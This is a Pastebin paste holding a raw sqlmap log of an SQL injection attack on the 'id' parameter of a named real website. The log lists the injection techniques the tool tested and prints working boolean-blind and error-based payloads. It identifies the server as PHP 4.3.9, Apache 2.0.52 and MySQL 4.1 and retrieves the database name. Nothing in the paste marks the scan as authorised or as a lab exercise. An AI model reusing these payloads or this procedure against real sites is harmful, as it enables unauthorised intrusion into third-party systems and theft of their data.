API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 25th, 2015
334
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.59 KB | None | 0 0
raw download clone embed print report
  1. [04:19:03] [INFO] testing connection to the target URL
  2. [04:19:07] [INFO] heuristics detected web page charset 'ascii'
  3. [04:19:07] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
  4. S
  5. [04:19:07] [INFO] testing if the target URL is stable
  6. [04:19:07] [INFO] target URL is stable
  7. [04:19:07] [INFO] testing if GET parameter 'id' is dynamic
  8. [04:19:08] [WARNING] GET parameter 'id' does not appear dynamic
  9. [04:19:08] [INFO] heuristic (basic) test shows that GET parameter 'id' might be
  10. injectable (possible DBMS: 'MySQL')
  11. [04:19:09] [INFO] testing for SQL injection on GET parameter 'id'
  12. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
  13. ecific for other DBMSes? [Y/n]
  14. for the remaining tests, do you want to include all tests for 'MySQL' extending
  15. provided level (1) and risk (1) values? [Y/n]
  16. [04:19:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  17. [04:19:14] [WARNING] reflective value(s) found and filtering out
  18. [04:19:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
  19. QL comment)'
  20. [04:20:01] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ
  21. L comment)'
  22. [04:22:09] [CRITICAL] connection dropped or unknown HTTP status code received. T
  23. ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
  24. andom-agent'. sqlmap is going to retry the request(s)
  25. [04:22:10] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE
  26. or HAVING clause (MySQL comment)' injectable
  27. [04:22:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
  28. Y or GROUP BY clause'
  29. [04:22:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
  30. or GROUP BY clause'
  31. [04:22:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
  32. Y or GROUP BY clause (EXTRACTVALUE)'
  33. [04:22:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
  34. or GROUP BY clause (EXTRACTVALUE)'
  35. [04:22:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
  36. Y or GROUP BY clause (UPDATEXML)'
  37. [04:22:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
  38. or GROUP BY clause (UPDATEXML)'
  39. [04:22:13] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
  40. Y or GROUP BY clause (EXP)'
  41. [04:22:13] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (E
  42. XP)'
  43. [04:22:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
  44. Y or GROUP BY clause (BIGINT UNSIGNED)'
  45. [04:22:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
  46. IGINT UNSIGNED)'
  47. [04:23:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
  48. Y or GROUP BY clause'
  49. [04:23:35] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
  50. [04:23:35] [INFO] GET parameter 'id' is 'MySQL >= 4.1 OR error-based - WHERE, HA
  51. VING clause' injectable
  52. [04:23:35] [INFO] testing 'MySQL inline queries'
  53. [04:23:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
  54. [04:23:36] [CRITICAL] considerable lagging has been detected in connection respo
  55. nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
  56. more)
  57. [04:23:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
  58. [04:23:37] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
  59. [04:23:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  60. [04:23:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment
  61. )'
  62. [04:23:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  63. [04:23:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
  64. [04:23:42] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
  65. [04:23:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - commen
  66. t)'
  67. [04:23:44] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment
  68. )'
  69. [04:23:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
  70. [04:23:46] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
  71. [04:23:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
  72. [04:23:47] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
  73. [04:23:48] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
  74. [04:23:59] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
  75. [04:24:10] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - c
  76. omment)'
  77. [04:24:22] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - co
  78. mment)'
  79. [04:24:33] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'
  80. [04:24:34] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT - comm
  81. ent)'
  82. [04:24:35] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
  83. [04:24:36] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
  84. [04:24:36] [INFO] testing 'MySQL AND time-based blind (ELT)'
  85. [04:24:37] [INFO] testing 'MySQL OR time-based blind (ELT)'
  86. [04:24:38] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
  87. [04:24:38] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
  88. [04:24:39] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDU
  89. RE ANALYSE (EXTRACTVALUE)'
  90. [04:24:42] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment)
  91. - PROCEDURE ANALYSE (EXTRACTVALUE)'
  92. [04:24:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
  93.  
  94. [04:24:43] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace
  95. (SELECT)'
  96. [04:24:44] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace
  97. (heavy queries)'
  98. [04:24:45] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
  99. [04:24:45] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
  100. [04:24:46] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)
  101. '
  102. [04:24:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  103. [04:24:47] [INFO] automatically extending ranges for UNION query injection techn
  104. ique tests as there is at least one other (potential) technique found
  105. [04:24:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  106. [04:25:07] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
  107. [04:25:18] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
  108. [04:25:27] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
  109.  
  110. [04:25:37] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
  111. [04:25:48] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
  112.  
  113. [04:25:59] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
  114. [04:26:14] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
  115.  
  116. [04:26:25] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
  117. [04:26:36] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns
  118. '
  119. [04:26:46] [WARNING] in OR boolean-based injections, please consider usage of sw
  120. itch '--drop-set-cookie' if you experience any problems during data retrieval
  121. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
  122. )? [y/N]
  123. sqlmap identified the following injection point(s) with a total of 369 HTTP(s) r
  124. equests:
  125. ---
  126. Parameter: id (GET)
  127. Type: boolean-based blind
  128. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  129. Payload: id=-9416 OR 2004=2004#
  130.  
  131. Type: error-based
  132. Title: MySQL >= 4.1 OR error-based - WHERE, HAVING clause
  133. Payload: id=140 OR ROW(3844,2686)>(SELECT COUNT(*),CONCAT(0x716b717a71,(SELE
  134. CT (ELT(3844=3844,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM (SELECT 5054 UNION S
  135. ELECT 2242 UNION SELECT 7306 UNION SELECT 8307)a GROUP BY x)
  136. ---
  137. [04:26:57] [INFO] the back-end DBMS is MySQL
  138. web application technology: PHP 4.3.9, Apache 2.0.52
  139. back-end DBMS: MySQL 4.1
  140. [04:26:57] [WARNING] information_schema not available, back-end DBMS is MySQL <
  141. 5. database names will be fetched from 'mysql' database
  142. [04:26:59] [WARNING] the SQL query provided does not return any output
  143. [04:26:59] [WARNING] in case of continuous data retrieval problems you are advis
  144. ed to try a switch '--no-cast' or switch '--hex'
  145. [04:26:59] [INFO] fetching number of databases
  146. [04:26:59] [WARNING] running in a single-thread mode. Please consider usage of o
  147. ption '--threads' for faster data retrieval
  148. [04:26:59] [INFO] retrieved:
  149. [04:27:01] [ERROR] unable to retrieve the number of databases
  150. [04:27:01] [INFO] falling back to current database
  151. [04:27:01] [INFO] fetching current database
  152. [04:27:02] [INFO] retrieved: magicwings2010bs
  153. available databases [1]:
  154. [*] magicwings2010bs
  155.  
  156. [04:27:02] [INFO] fetched data logged to text files under 'C:\Documents and Sett
  157. ings\root\.sqlmap\output\www.magicwings.com'
  158.  
  159. [*] shutting down at 04:27:02
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!